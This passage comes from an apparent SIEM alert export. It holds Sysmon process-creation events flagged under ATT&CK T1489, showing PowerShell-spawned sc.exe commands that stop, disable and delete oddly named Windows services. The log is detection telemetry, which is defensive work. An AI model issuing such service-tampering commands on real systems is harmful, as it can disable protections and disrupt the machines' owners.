Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.038",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.081 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010630a2b00} +ProcessId: 8188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationalwpi Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationalwpi Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.085706900Z"",""eventRecordID"":""3155"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.081\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010630a2b00}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationalwpi Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.081"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010630a2b00}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationalwpi Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.001",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.044 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010ef072b00} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.048020400Z"",""eventRecordID"":""3153"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.044\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010ef072b00}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.044"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010ef072b00}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.825",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.985 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00108f042b00} +ProcessId: 612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.987871600Z"",""eventRecordID"":""3150"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.985\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00108f042b00}\r\nProcessId: 612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.985"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-00108f042b00}"",""processId"":""612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.738",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.951 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001045022b00} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.953859200Z"",""eventRecordID"":""3148"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.951\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001045022b00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.951"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001045022b00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.644",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.934 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001058012b00} +ProcessId: 7452 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.940269600Z"",""eventRecordID"":""3147"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.934\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001058012b00}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.934"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001058012b00}"",""processId"":""7452"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.427",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.857 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-0010e3fe2a00} +ProcessId: 6836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.863622600Z"",""eventRecordID"":""3144"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.857\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-0010e3fe2a00}\r\nProcessId: 6836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.857"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-0010e3fe2a00}"",""processId"":""6836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.439",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.583 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001065fa2a00} +ProcessId: 7672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service 